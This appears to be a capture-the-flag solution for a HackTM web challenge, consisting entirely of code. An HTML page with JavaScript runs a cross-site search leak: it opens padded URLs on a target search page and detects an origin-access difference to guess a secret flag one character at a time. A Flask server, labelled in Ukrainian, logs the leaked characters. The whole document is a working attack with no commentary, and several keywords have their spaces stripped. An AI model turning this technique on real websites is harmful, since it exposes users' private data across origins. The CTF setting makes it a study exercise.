<html><body></body><script>(async () => {constcurr="http://secrets.wtl.pw/search?query=HackTM{"constleak=async (char) => {fetch("/?try="+ char)let w =window.open(curr + char +"#"+"A".repeat(2*1024*1024-curr.length-2))constcheck=async () => {try {w.origin} catch {fetch("/?nope="+ char)return}setTimeout(check,100)}check()}constCHARSET="abcdefghijklmnopqrstuvwxyz-_0123456789"for (let i =0; i <CHARSET.length; i++) {leak(CHARSET[i])awaitnewPromise(resolve =>setTimeout(resolve,50))}})()</script></html>
Серверна сторона:
from flask import Flask, requestapp =Flask(__name__)CHARSET ="abcdefghijklmnopqrstuvwxyz-_0123456789"chars = []@app.route('/', methods=['GET'])defindex():global charsnope = request.args.get('nope', '')if nope:chars.append(nope)remaining = [c for c in CHARSET if c notin chars]print("Remaining: {}".format(remaining))return"OK"@app.route('/exploit.html', methods=['GET'])defexploit():returnopen('exploit.html', 'r').read()if__name__=='__main__':app.run(host='0.0.0.0', port=1337)